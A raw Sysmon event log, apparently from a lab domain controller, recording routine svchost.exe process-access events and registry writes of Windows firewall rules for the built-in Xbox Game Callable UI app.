13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000011075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:22.774{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|M=microsoft.xboxgamecallableui_cw5n1h2txyewy|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|D=C:\Windows\SystemApps\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\|PFN=Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy| 13241300x800000000000000011074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:22.774{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{B07A1A03-FAD3-4152-8578-2E570A6EF22F}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Platform=2:6:2|Platform2=GTEQ| 13241300x800000000000000011073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:22.774{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{B42DA77E-909D-40CB-8A97-0C7073DE830F}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntErnet|RA62=IntErnet|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-1)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 13241300x800000000000000011072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:58:22.774{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{780252E5-2381-486F-8BF3-78FD780D7099}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 13241300x800000000000000011071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:22.774{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{70B7A482-2497-482F-B926-BD566E03D19C}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|Desc=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|AppPkgId=S-1-15-2-957941444-2271171641-4049211970-804197638-2225746618-2474488012-4131196493|EmbedCtxt=@{Microsoft.XboxGameCallableUI_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.XboxGameCallableUI/resources/PkgDisplayName}| 10341000x800000000000000011070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
